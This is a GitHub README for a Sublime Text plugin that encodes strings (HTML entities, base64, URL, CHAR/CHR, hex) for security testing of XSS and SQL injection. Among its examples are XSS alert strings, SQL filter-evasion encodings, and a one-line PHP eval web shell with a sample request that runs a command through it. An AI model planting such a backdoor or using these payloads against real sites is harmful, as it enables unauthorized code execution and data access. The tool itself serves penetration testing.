Skip to content

Latest commit

 

History

History
183 lines (95 loc) · 3.29 KB

README.md

File metadata and controls

183 lines (95 loc) · 3.29 KB

Sublime XssEncode

English | 中文说明

Converts characters from one encoding to another using a transformation. This tool will help you encode payloads in testing sql injections, XSS holes and site security.

Convert the region you selected or convert all characters.

XssEncode supports both Sublime Text 2 and 3.

Installation

Using Package Control to find, install and upgrade XssEncode is the recommended method to install this plug-in.

Otherwise, you can use the following steps manually install:

  1. Open the Sublime Text Packages folder

    • OS X: ~/Library/Application Support/Sublime Text 3/Packages/
    • Windows: %APPDATA%/Sublime Text 3/Packages/
    • Linux: ~/.Sublime Text 3/Packages/ or ~/.config/sublime-text-3/Packages
  2. clone this repo

    git clone https://github.com/Medicean/SublimeXssEncode.git
    
  3. Rename the new folder to xssencode

ChangeLog

See more at ChangeLog

Example Commands

You can type the Command HotKeys(Win: ctrl+shift+p, OSX: Command+shift+p),type xssencode and choice your action。Otherwise, click the menu bar tools => XssEncode and choice your action.

  • html_escape

    Converts characters to their HTML entity.

    eg:

    a1@& => a1@&

  • html10_encode

    Converts characters to html entity with decimal.

    eg:

    a1@& => a1@&

  • html16_encode

    Converts characters to html entity with hexadecimal.

    eg:

    a1@& => a1@&

  • html_unescape

    Converts html entity to characters.

    eg:

    aaa& => aaa&

  • base64_encode

    Uses base64 to encode into base64

    eg:

    a1@& => YTFAJg==

  • base64_decode

    eg:

    YTFAJg== => a1@&

  • url_encode

    eg:

    alert(/xss/); => alert%28/xss/%29%3B

  • url_decode

    eg:

    alert%28/xss/%29%3B => alert(/xss/);

  • string_from_char_code

    eg:

    alert(/xss/); => String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41,59)

  • mysql_char

    eg:

    123 => CHAR(49,50,51)

    You can excute the sql commands below.

    select 123;

    select CHAR(49,50,51);

  • oracle_chr

    eg:

    123 => CHR(49)||CHR(50)||CHR(51)

    You can excute the sql commands below.

    select 123;

    select CHR(49)||CHR(50)||CHR(51);

  • php_chr

    Convert characters with function chr.

    eg:

    Support we have a php backdoor, and the content is <?php @eval($_REQUEST[cmd]);?>

    if you want to execute some commands which includes special chars, you can convert it.

    ls -al => CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108)

    now you can request the url below:

    http://127.0.0.1/backdoor.php?cmd=system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(97).CHR(108));

  • string_to_hex

    Convert string to hexadecimal, it's more useful for sql injection.

    eg:

    root => 726f6f74

    now you can excute the sql commands below.

    SELECT user from mysql.user where user='root';

    SELECT user from mysql.user where user=0x726f6f74;

  • hex_to_string

    eg:

    726f6f74 => root

  • unicode_decode

    eg:

    测试 => \u6d4b\u8bd5

  • unicode_encode

    eg:

    \u6d4b\u8bd5 => 测试

  • md5_encode

    eg:

    1 => c4ca4238a0b923820dcc509a6f75849b